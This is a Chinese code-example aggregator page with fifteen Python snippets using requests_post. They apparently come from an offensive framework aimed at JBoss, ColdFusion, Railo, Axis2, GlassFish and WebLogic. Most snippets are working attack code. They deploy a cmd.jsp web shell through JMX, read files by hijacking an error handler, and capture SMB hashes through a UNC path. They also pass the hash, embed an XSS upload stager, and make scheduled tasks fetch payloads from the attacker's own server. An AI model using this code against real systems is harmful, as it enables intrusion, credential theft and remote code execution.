本文整理汇总了Python中utility.requests_post函数的典型用法代码示例。如果您正苦于以下问题:Python requests_post函数的具体用法?Python requests_post怎么用?Python requests_post使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了requests_post函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: manage_undeploy
def manage_undeploy(fingerengine, fingerprint):
""" This is used to undeploy from JBoss 7.x and 8.x
"""
context = fingerengine.options.undeploy
context = parse_war_path(context)
url = 'http://{0}:{1}/management'.format(fingerengine.options.ip,
fingerprint.port)
undeploy = '{{"operation":"remove", "address":{{"deployment":"{0}"}}}}'\
.format(context)
headers = {'Content-Type':"application/json"}
response = utility.requests_post(url, headers=headers, data=undeploy)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookie = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookie:
response = utility.requests_post(url, headers=headers, data=undeploy,
cookies=cookie[0], auth=cookie[1])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
if response.status_code == 200:
utility.Msg("{0} successfully undeployed".format(context), LOG.SUCCESS)
else:
utility.Msg("Failed to undeploy", LOG.ERROR)示例2: fetchId
def fetchId(base, path, cookie):
""" Pretty simple two-step process to fetch the id:
a) Set the error handler template to the id file
b) Trigger an error
c) restore handler
"""
# set error handler
set_template = '/railo-context/admin/web.cfm?action=server.error'
data = { 'errType500' : 'Select',
'errorTemplate_Select500' : '/railo-context/templates/error/error.cfm', # default
'errType404' : 'File',
'errorTemplate_File404' : '/railo-context/../id',
'doStatusCode' : 'yes',
'mainAction' : 'update'
}
response = utility.requests_post(base + set_template, data=data, cookies=cookie)
if response.status_code is not 200:
utility.Msg("Failed to set error handler (HTTP %d)" % response.status_code, LOG.ERROR)
return None
# trigger 404 and pull file
response = utility.requests_get(base + '/railo-context/admin/xx.cfm')
id = response.content
# got the ID, restore handler
data['errorTemplate_File404'] = '/railo-context/templates/error/error.cfm'
response = utility.requests_post(base + set_template, data=data, cookies=cookie)
return id示例3: run7
def run7(self, fingerengine, fingerprint):
""" Runs our OS query using the HTTP API
NOTE: This does not work against 7.0.0 or 7.0.1 because the platform-mbean
was not exposed until 7.0.2 and up. See AS7-340
"""
url = "http://{0}:{1}/management".format(fingerengine.options.ip,
fingerprint.port)
info = '{"operation":"read-resource", "include-runtime":"true", "address":'\
'[{"core-service":"platform-mbean"},{"type":"runtime"}], "json.pretty":1}'
headers = {"Content-Type":"application/json"}
response = utility.requests_post(url, data=info, headers=headers)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_post(url, data=info, cookies=cookies[0],
auth=cookies[1], headers=headers)
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if response.status_code == 200:
result = response.json()['result']
for key in result.keys():
if 'system-properties' in key:
for skey in result[key].keys():
utility.Msg('\t%s: %s' % (skey, result[key][skey]))
else:
utility.Msg('\t%s: %s' % (key, result[key]))
elif response.status_code == 500:
utility.Msg("Failed to retrieve system properties, checking if "
"this is 7.0.0/7.0.1...")
info = '{"operation":"read-attribute", "name":"server-state"}'
response = utility.requests_post(url, data=info, headers=headers)
if response.status_code == 200:
utility.Msg("Older version found. This version is unsupported.")
else:
utility.Msg("Failed to retrieve info (HTTP %d)", response.status_code,
LOG.DEBUG)
else:
utility.Msg("Failed to retrieve info (HTTP %d)" % response.status_code,
LOG.DEBUG) 示例4: deploy
def deploy(fingerengine, fingerprint):
""" Exploits the DeploymentFileRepository bean to deploy
a JSP to the remote server. Note that this requires a JSP,
not a packaged or exploded WAR.
"""
war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file)
if '.war' in war_file:
tmp = utility.capture_input("This deployer requires a JSP, default to cmd.jsp? [Y/n]")
if "n" in tmp.lower():
return
war_file = abspath("./src/lib/resources/cmd.jsp")
war_name = "cmd"
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(
fingerengine.options.ip, fingerprint.port)
data = OrderedDict([
('action', 'invokeOp'),
('name', 'jboss.admin:service=DeploymentFileRepository'),
('methodIndex', 5),
('arg0', war_file.replace('.jsp', '.war')),
('arg1', war_name),
('arg2', '.jsp'),
('arg3', open(war_file, 'r').read()),
('arg4', True)
])
response = utility.requests_post(url, data=data)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth for JMX, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_post(url, data=data, cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if response.status_code == 200:
utility.Msg("Successfully deployed {0}".format(war_file), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy (HTTP %d)" % response.status_code, LOG.ERROR)示例5: run
def run(self, fingerengine, fingerprint):
""" This module will invoke jboss:load() with a UNC path to force the
server to make a SMB request, thus giving up its encrypted hash with a
value we know (1122334455667788).
Thanks to @cd1zz for the idea for this
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener..")
self._Listen= True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC loader...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = '/jmx-console/HtmlAdaptor'
data = self.getData(fingerprint.version)
url = base + uri
response = utility.requests_post(url, data=data)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_post(url, data=data,
cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 500:
utility.Msg("Unexpected response: HTTP %d" % response.status_code, LOG.DEBUG)
self._Listen = False示例6: create_task
def create_task(ip, fingerprint, cfm_file, root):
""" Create the task
"""
url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\
format(ip, fingerprint.port)
upload_stager_xss = "/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EY!%3Ccfcatch%3EN!%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E"
(cookie, csrf) = fetch_csrf(ip, fingerprint, url)
data = {
"csrftoken" : csrf,
"TaskName" : cfm_file,
"Start_Date" : "Jan 27, 2014", # shouldnt matter since we force run
"ScheduleType" : "Once",
"StartTimeOnce" : "9:56 PM", # see above
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:{1}/{2}".format(ip, fingerprint.port, upload_stager_xss),
"publish" : "1",
"publish_file" : root + "\\" + cfm_file, # slash on OS?
"adminsubmit" : "Submit"
}
response = utility.requests_get(url, cookies=cookie)
if response.status_code is 200:
# create task
response = utility.requests_post(url, data=data, cookies=cookie,
headers={'Content-Type':'application/x-www-form-urlencoded'})
if response.status_code is 200:
return True示例7: attemptPTH
def attemptPTH(url, usr_auth):
""" In vulnerable instances of CF7-9, you can use --cf-hash to obtain
the remote server's hash and pass it.
"""
utility.Msg("Attempting to pass the hash..", LOG.DEBUG)
usr = None
pwhsh = None
if ':' in usr_auth:
(usr, pwhsh) = usr_auth.split(':')
else:
(usr, pwhsh) = "admin", usr_auth
salt = _salt(url)
hsh = hmac.new(salt, pwhsh, sha1).hexdigest().upper()
data = {"cfadminPassword" : hsh,
"requestedURL" : "/CFIDE/administrator/enter.cfm?",
"cfadminUserId" : usr,
"salt" : salt,
"submit" : "Login"
}
try:
res = utility.requests_post(url, data=data)
if res.status_code is 200 and len(res.history) > 0:
utility.Msg("Sucessfully passed the hash", LOG.DEBUG)
return (dict_from_cookiejar(res.history[0].cookies), None)
except Exception, e:
utility.Msg("Error authenticating: %s" % e, LOG.ERROR)示例8: _auth
def _auth(usr, pswd, url, version):
""" Authenticate to the remote ColdFusion server; bit of a pain
"""
if version in ['9.0']:
salt = _salt(url)
hsh = hmac.new(salt, sha1(pswd).hexdigest().upper(), sha1).hexdigest().upper()
data = {"cfadminPassword" : hsh,
"requestedURL" : "/CFIDE/administrator/enter.cfm?",
"cfadminUserId" : usr,
"salt" : salt,
"submit" : "Login"
}
elif version in ['10.0']:
hsh = sha1(pswd).hexdigest().upper()
data = {'cfadminPassword' : hsh,
'requestedURL' : '/CFIDE/administrator/enter.cfm?',
'cfadminUserId' : usr,
'submit' : 'Login'
}
try:
res = utility.requests_post(url, data=data)
if res.status_code is 200 and len(res.history) > 0:
utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd), LOG.DEBUG)
return (dict_from_cookiejar(res.history[0].cookies), None)
except Exception, e:
utility.Msg("Error authenticating: %s" % e, LOG.ERROR)
return (None, None)示例9: deploy
def deploy(fingerengine, fingerprint):
""" Upload a service via the administrative interface
"""
cookie = None
file_path = abspath(fingerengine.options.deploy)
file_name = parse_war_path(file_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)
if not cookie:
utility.Msg("Could not get auth to %s:%s" % (dip, fingerprint.port), LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}".format(file_name))
base = "http://{0}:{1}".format(dip, fingerprint.port)
uri = "/axis2/axis2-admin/upload"
payload = {"filename": open(file_path, "rb")}
response = utility.requests_post(base + uri, files=payload, cookies=cookie)
if response.status_code is 200:
if "The following error occurred" in response.content:
error = findall("occurred <br/> (.*?)</font>", response.content)
utility.Msg("Failed to deploy {0}. Reason: {1}".format(file_name, error[0]), LOG.ERROR)
else:
utility.Msg(
"{0} deployed successfully to /axis2/services/{1}".format(file_name, parse_war_path(file_path)),
LOG.SUCCESS,
)
else:
utility.Msg("Failed to deploy {0} (HTTP {1})".format(file_name, response.status_code), LOG.ERROR)示例10: deploy
def deploy(fingerengine, fingerprint):
""" Upload a service via the administrative interface
"""
cookie = None
file_path = abspath(fingerengine.options.deploy)
file_name = parse_war_path(file_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)
if not cookie:
utility.Msg("Could not get auth to %s:%s" % (dip, fingerprint.port),
LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}".format(file_name))
base = 'http://{0}:{1}'.format(dip, fingerprint.port)
uri = '/axis2/axis2-admin/upload'
payload = {'filename' : open(file_path, 'rb')}
response = utility.requests_post(base + uri, files=payload, cookies=cookie)
if response.status_code is 200:
utility.Msg("{0} deployed successfully to /axis2/services/{1}".
format(file_name, parse_war_path(file_path)),
LOG.SUCCESS)
else:
utility.Msg("Failed to deploy {0} (HTTP {1})".format(file_name,
response.status_code), LOG.ERROR)示例11: make_request
def make_request(method,host,port,ssl,url,data,cookies=None,allow_redirects=True):
response = None
if port == None and ssl:
port = 443
if port == None and not ssl:
port = 80
try:
url = "{0}://{1}:{2}{3}".format("https" if ssl else "http",
host, port,url)
if method == 'GET':
response = utility.requests_get(url,cookies=cookies)
elif method == 'BASIC':
response = utility.requests_get(url,cookies=cookies,auth=(data['username'],data['password']))
elif method == 'POST':
response = utility.requests_post(url,data,cookies=cookies,allow_redirects=allow_redirects)
elif method == 'HEAD':
response = utility.requests_head(url,cookies=cookies)
elif method == 'PUT':
response = utility.requests_put(url,data,cookies=cookies)
else:
response = utility.requests_other(method,url,cookies=cookies)
return response
except exceptions.Timeout:
utility.Msg("Timeout to {0}:{1}".format(host,port), 'DEBUG')
except exceptions.ConnectionError, e:
utility.Msg("Connection error to {0} ({1})".format(host,port, e),'DEBUG')示例12: create_task
def create_task(ip, fingerprint, cfm_file, root):
""" Create the task
"""
url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\
format(ip, fingerprint.port)
(cookie, csrf) = fetch_csrf(ip, fingerprint, url)
data = {
"csrftoken" : csrf,
"TaskName" : cfm_file,
"Start_Date" : "Jan 27, 2014", # shouldnt matter since we force run
"ScheduleType" : "Once",
"StartTimeOnce" : "9:56 PM", # see above
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:8000/{1}".format(utility.local_address(), cfm_file),
"publish" : "1",
"publish_file" : root + "\\" + cfm_file, # slash on OS?
"adminsubmit" : "Submit"
}
if fingerprint.version in ["10.0"]:
data['publish_overwrite'] = 'on'
response = utility.requests_get(url, cookies=cookie)
if response.status_code is 200:
# create task
response = utility.requests_post(url, data=data, cookies=cookie,
headers={'Content-Type':'application/x-www-form-urlencoded'})
if response.status_code is 200:
return True示例13: run_task
def run_task(ip, fingerprint, cfm_path):
"""
"""
global cookie
cfm_file = parse_war_path(cfm_path, True)
# kick up server
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
sleep(2)
base = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, fingerprint.port)
params = "?action=services.schedule"
data = OrderedDict([
("row_1", "1"),
("name_1", cfm_file),
("mainAction", "execute")
])
response = utility.requests_post(base + params, data=data, cookies=cookie)
if waitServe(server_thread):
utility.Msg("{0} deployed to /{0}".format(cfm_file), LOG.SUCCESS)
killServe()示例14: deploy
def deploy(fingerengine, fingerprint):
""" Upload via the exposed REST API
"""
if fingerprint.version in ['3.1', '4.0']:
state.ssl = True
war_file = fingerengine.options.deploy
war_path = abspath(war_file)
war_name = parse_war_path(war_file)
dip = fingerengine.options.ip
headers = {
"Accept" : "application/json",
"X-Requested-By" : "requests"
}
cookie = checkAuth(dip, fingerprint.port, title)
if not cookie:
utility.Msg("Could not get auth to %s:%s" % (dip, fingerprint.port),
LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(war_file))
base = 'http://{0}:{1}'.format(dip, fingerprint.port)
uri = '/management/domain/applications/application'
data = {
'id' : open(war_path, 'rb'),
'force' : 'true'
}
response = utility.requests_post(base + uri, files=data,
auth=cookie,
headers=headers)
if response.status_code is 200:
if fingerprint.version in ['3.0']:
# GF 3.0 ignores context-root and appends a random character string to
# the name. We need to fetch it, then set it as our random_int for
# invoke support. There's also no list-wars in here...
url = base + '/management/domain/applications/application'
response = utility.requests_get(url, auth=cookie, headers=headers)
if response.status_code is 200:
data = json.loads(response.content)
for entry in data[u"Child Resources"]:
if war_name in entry:
rand = entry.rsplit('/', 1)[1]
rand = rand.split(war_name)[1]
fingerengine.random_int = str(rand)
utility.Msg("Deployed {0} to :8080/{0}{1}".format(war_name, rand),
LOG.SUCCESS)
else:
utility.Msg("Deployed {0} to :8080/{0}".format(war_name), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy {0} (HTTP {1})".format(war_name,
response.status_code),
LOG.ERROR)示例15: _auth
def _auth(usr, pswd, ip, fingerprint):
""" Authenticate to j_security_check and return the cookie
"""
try:
base = "http://{0}:{1}".format(ip, fingerprint.port)
uri = "/console/j_security_check"
data = { "j_username" : usr,
"j_password" : pswd,
"j_character_encoding" : "UTF-8"
}
if fingerprint.title is WINTERFACES.WLS:
base = base.replace("http", "https")
response = utility.requests_post(base + uri, data=data)
if len(response.history) > 1:
cookies = dict_from_cookiejar(response.history[0].cookies)
if not cookies:
return False
else:
utility.Msg("Successfully authenticated with %s:%s" %
(usr, pswd), LOG.DEBUG)
return (cookies, None)
except Exception, e:
utility.Msg("Failed to authenticate: %s" % e)